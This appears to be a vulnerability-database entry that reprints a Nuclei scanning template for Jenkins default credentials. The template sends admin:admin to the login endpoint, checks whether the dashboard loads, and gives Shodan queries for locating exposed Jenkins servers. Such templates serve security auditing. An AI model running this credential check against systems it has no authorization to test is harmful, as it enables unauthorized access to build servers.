jenkins-weak-password: Jenkins Default Login

日期: 2025-08-01 | 影响软件: Jenkins | POC: 已公开

漏洞描述

Jenkins credentials of admin:admin were discovered.

PoC代码[已公开]

id: jenkins-weak-password

info:
  name: Jenkins Default Login
  author: Zandros0
  severity: high
  description: Jenkins credentials of admin:admin were discovered.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
    cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:*
  metadata:
    product: jenkins
    vendor: jenkins
    shodan-query:
      - cpe:"cpe:2.3:a:jenkins:jenkins"
      - http.favicon.hash:"81586312"
      - product:"jenkins"
      - x-jenkins
      - title:"Jenkins"
    max-request: 3
  tags: jenkins,default-login,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /j_spring_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username=admin&j_password=admin&from=%2F&Submit=Sign+in
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3, "/logout")'
          - 'contains(body_3, "<title>Dashboard -") || contains(body_3, "Dashboard [Jenkins]")'
        condition: and
# digest: 490a0046304402205a24d467257670c8b6fe225fae24f77e6fc3ed9665a8f362e626301104dd777f022029f4b907bdf527b318a55f748ac58fe7b91a815d5d99cd27708bccf73ee5b5b5:922c64590222798bb761d5b6d8e72950

相关漏洞推荐